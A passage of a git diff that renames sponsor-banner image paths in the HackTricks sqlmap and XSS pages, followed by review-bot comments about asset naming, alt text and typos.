@@ -14,7 +14,7 @@ Other ways to support HackTricks: </details> -<figure><img src="../../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. @@ -236,7 +236,7 @@ Remember that **you can create your own tamper in python** and it's very simple. | versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment | | xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For' | -<figure><img src="../../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure> **Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun. diff --git a/pentesting-web/xss-cross-site-scripting/README.md b/pentesting-web/xss-cross-site-scripting/README.md index 1ad72fe44..fd6be1550 100644 --- a/pentesting-web/xss-cross-site-scripting/README.md +++ b/pentesting-web/xss-cross-site-scripting/README.md 
@@ -1,6 +1,6 @@ # XSS (Cross Site Scripting) -<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure> If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). @@ -1544,7 +1544,7 @@ Find **more SVG payloads in** [**https://github.com/allanlw/svg-cheatsheet**](ht * [https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec](https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec) * [https://netsec.expert/2020/02/01/xss-in-2020.html](https://netsec.expert/2020/02/01/xss-in-2020.html) -<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure> +<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure> If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
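Review bot: the `image (1) (1).png` to `image (1) (1) (1).png` swap in pentesting-web/file-upload/README.md (and the identical hunks in hacking-jwt-json-web-tokens.md, ldap-injection.md, sql-injection/postgresql-injection/README.md and xss-cross-site-scripting/README.md, ten references in all) points the same sponsor banner at a filename that is one more GitBook collision suffix deep, which is exactly the pattern that will force this whole-tree edit again on the next asset upload. Suggest giving the banner one stable, descriptive asset name (something like `sponsor-banner.png`, name hypothetical) and referencing it from a single shared snippet so the next rename is a one-line change; at minimum, grep the tree for any remaining `image (1) (1).png` references before merging, since a page missed here renders a broken figure without any build error.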
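Review bot: in the pentesting-web/hacking-with-cookies/README.md hunk the two figures being re-pointed (`image (6)` and `image (7)`) are the only place the page shows the actual `__Host-` bypass payloads (the leading "=" parser trick and the PHP characters-replaced-by-underscore trick), and both keep `alt=""`, so every asset rename like this one risks silently losing the technique with nothing in the text to fall back on. Suggest putting the payload strings into the body text or at least into the `alt` attribute, and while these lines are in the diff context fix "beggining"/"beginig" and the inconsistent `\_\_HOST-` / `__HOST-` spellings of the `__Host-` prefix used earlier in the same paragraph.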
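Review bot: the pentesting-web/csrf-cross-site-request-forgery.md hunk leaves the "test from the bowser" typo in the context line immediately above the changed figure; since that line is already inside the hunk, fix it to "browser" in the same commit rather than leaving it for another pass.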
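Review bot: the pentesting-web/sql-injection/sqlmap/README.md hunk re-points `image (14).png` to `image (14) (1).png` at both the top-of-page and post-tamper-table sponsor slots, and the browser-extension hunk does the same for `image (16)`, but nothing in the diff says why the nested-suffix name is the live one and the old one is not. A one-line commit note naming the upload that produced the collision, or a check that the old paths no longer exist in the tree, would let a reviewer verify that each new path actually resolves instead of trusting the rename.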